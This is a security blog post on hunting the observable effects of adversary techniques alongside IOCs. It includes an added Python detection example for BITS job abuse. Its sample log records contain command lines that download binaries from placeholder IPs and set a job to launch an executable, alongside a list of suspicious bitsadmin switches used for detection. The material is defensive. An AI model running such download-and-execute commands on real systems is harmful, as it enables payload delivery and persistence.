Easy Security — Hunting IOCs or Effects?

Kyle Topasna
3 min read · Sep 28, 2021

Let’s Set the Scene

RSA once defined indicators of compromise (IOCs) as:

“…an artifact observed on a network or in an operating system that, with HIGH CONFIDENCE, indicates a computer intrusion.”

Analysts and defenders are often focused on hunting IOCs, and for a good reason. Whether that’s FireEye’s Mandiant or your favorite infosec person on Twitter, your threat intel platform delivers actionable data on the latest threat. You can now go and search for “bad” on your network, hoping you don’t find anything.

You see, if you hunt IOCs (which you should), you are operating under a considerable time lag. This lag exists because another analyst or researcher had to release that IOC for public consumption first, and those who only hunt IOCs will always be waiting for the next one. Tracking down IOCs is an excellent practice to follow, but what if you went further? What if you hunted Effects in addition to IOCs?

The Lifecycle of an IOC

Modifying RSA’s definition of IOC, we can say that an effect is a measurable or observable artifact on a network or operating system. Using this definition, we can create a lifecycle that looks like the following.

Where to Find Artifacts for Effects?

My favorite resource by far is the MITRE ATT&CK Matrix. Hunting for evidence of effects that adversary tactics, techniques, and procedures (TTPs) generate is invaluable for developing your own defensive TTPs and going beyond just signatures and IOCs.

https://attack.mitre.org/

If we pick a random TTP such as “BITS Jobs” under Defense Evasion, we can get an example of sources of log data we might want to narrow in on.

https://attack.mitre.org/techniques/T1197/

Collecting those sources, we might begin to detect the malicious activity of that TTP without the need for targeted IOCs, possibly uncovering new APT activity.
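To make the IOC-versus-effect distinction concrete, here is an added example that is not part of the original post. It runs two hunts over a handful of constructed process-creation records (hypothetical hosts, with URLs drawn from the RFC 5737 documentation ranges): an IOC hunt that only knows one published URL, and an effect hunt that looks for the behaviour of T1197 itself, i.e. bitsadmin.exe invoked with job-creation or transfer switches, or PowerShell calling Start-BitsTransfer. The field names (host, image, cmdline) are an assumed normalisation of what a Windows 4688 or Sysmon Event ID 1 record carries; the switch list is a starting point, not an exhaustive signature.

```python
"""IOC hunt versus effect hunt over constructed process-creation records (T1197, BITS Jobs)."""
import re

# Constructed sample records (hypothetical). Field names assume the log pipeline has
# normalised Windows 4688 / Sysmon Event ID 1 into host, image and cmdline.
SAMPLE_EVENTS = [
    {"host": "ws01", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /transfer upd /download /priority normal "
                r"http://203.0.113.10/update.bin C:\Users\Public\update.bin"},
    {"host": "ws02", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /SetNotifyCmdLine upd C:\Users\Public\run.exe NULL"},
    {"host": "ws03", "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -c Start-BitsTransfer -Source http://198.51.100.7/a.bin "
                r"-Destination C:\Users\Public\a.bin"},
    {"host": "ws04", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r"bitsadmin /list /allusers"},               # benign: enumerating jobs
    {"host": "ws05", "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r"svchost.exe -k netsvcs -p -s BITS"},        # benign: the service host itself
]

# IOC feed as it might arrive from a vendor report: a single, already-public URL (constructed).
IOC_URLS = {"http://203.0.113.10/update.bin"}

# Effect rule: bitsadmin switches that create, populate, arm or start a job.
# These are real bitsadmin options; the set is illustrative, not complete.
SUSPICIOUS_BITSADMIN_SWITCHES = {"/transfer", "/addfile", "/setnotifycmdline", "/create", "/resume"}
URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)


def extract_urls(cmdline):
    """Pull every http(s) URL out of a command line, lower-cased for comparison."""
    return [u.lower() for u in URL_RE.findall(cmdline)]


def ioc_hunt(events, ioc_urls):
    """Indices of events whose command line references a known-bad URL."""
    bad = {u.lower() for u in ioc_urls}
    return [i for i, ev in enumerate(events)
            if any(u in bad for u in extract_urls(ev["cmdline"]))]


def effect_hunt(events):
    """(index, reason) for events that exhibit BITS job creation or transfer behaviour."""
    hits = []
    for i, ev in enumerate(events):
        image = ev["image"].lower().rsplit("\\", 1)[-1]   # basename of the executable
        tokens = ev["cmdline"].lower().split()
        if image == "bitsadmin.exe":
            switches = SUSPICIOUS_BITSADMIN_SWITCHES.intersection(tokens)
            if switches:
                hits.append((i, "bitsadmin " + " ".join(sorted(switches))))
        elif image in ("powershell.exe", "pwsh.exe") and "start-bitstransfer" in tokens:
            hits.append((i, "Start-BitsTransfer cmdlet"))
    return hits


def compare(events, ioc_urls):
    """Show what each hunt catches that the other misses."""
    ioc = set(ioc_hunt(events, ioc_urls))
    effect = {i for i, _ in effect_hunt(events)}
    return {"ioc_only": sorted(ioc - effect),
            "effect_only": sorted(effect - ioc),
            "both": sorted(ioc & effect)}


if __name__ == "__main__":
    for i, reason in effect_hunt(SAMPLE_EVENTS):
        print(f"{SAMPLE_EVENTS[i]['host']}: {reason}")
    print(compare(SAMPLE_EVENTS, IOC_URLS))
```

The IOC hunt fires once, on the host that fetched the published URL; the effect hunt fires on that host and on the two that used a different URL or a different tool entirely, while staying quiet on the job listing and the BITS service host. That gap is the time lag the post describes: the effect was observable before anyone published the indicator.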

To help with this, I’ve created posts on how to set up collecting network traffic and Windows logs.

Conclusion

Above we quickly went over how Effects lead to IOCs, and why we should aim to detect both. I hope you found this post beneficial!

Kyle Topasna

Cybersecurity Professional, AI Engineer, Data Scientist